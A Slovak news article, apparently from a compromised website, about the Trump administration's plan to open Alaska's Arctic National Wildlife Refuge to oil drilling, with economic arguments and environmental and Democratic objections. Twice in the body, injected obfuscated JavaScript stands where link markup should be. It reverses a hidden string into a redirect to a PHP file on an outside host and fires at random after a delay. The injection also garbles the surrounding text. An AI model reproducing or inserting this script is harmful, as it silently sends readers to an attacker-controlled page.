Trumpova administratíva finišuje s plánom na umožnenie ťažby ropy na Aljaške

V hre sú nové pracovné miesta a podpora miestnej i americkej ekonomiky, ale aj obavy o zničenie prírody. Demokratom sa hlavne nepáči, že Trump chce povolenie udeliť ešte pred prezidentskými voľbami.

$mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donald-trump-zvazuje-rozsirenie-danovych-ulav-pre-investicie-do-akcii/“>Donald Trump chce ešte pred jesennými voľbami udeliť ťažobným spoločnostiam povolenie na ťažbu ropy na Aljaške na ,,niekoľko dlhých desaťročí,“ ako píše agentúra Reuters. $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom/“>Ropa a zemný plyn by sa mohli začať dobývať v oblastiach, kde to kvôli panenskej prírode aj pôvodnému obyvateľstvu doteraz nebolo umožnené. Konkrétne ide o prírodnú rezerváciu Arctic National Wildlife Refuge.

Podľa zástupcov ťažiarskeho priemyslu aj aljašského guvernéra Michaela Dunleavyho by zverejnenie tejto oblasti pre dobývanie strategickej suroviny znamenalo vytvorenie nových pracovných miest a významnú podporu ekonomiky celého štátu Aljaška. Demokrati a ochrancovia prírody však varujú, že takýto krok by poškodil vzácny arktický ekosystém a narušil život pôvodného obyvateľstva.

Demokrati tiež kritizovali, že Trump chce udeliť ťažbe zelenú ešte pred prezidentskými voľbami. Americký minister vnútra David Bernhardt ale uistil, že s povolením môže počkať až do konca roka. A aj potom by vraj trvalo asi osem rokov, než by sa v rezervácii skutočne začalo ťažiť. Ak by k tomu došlo, ťažobná aktivita by tam podľa Bernhardta prebiehala asi päťdesiat rokov.

Jeden komentář

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *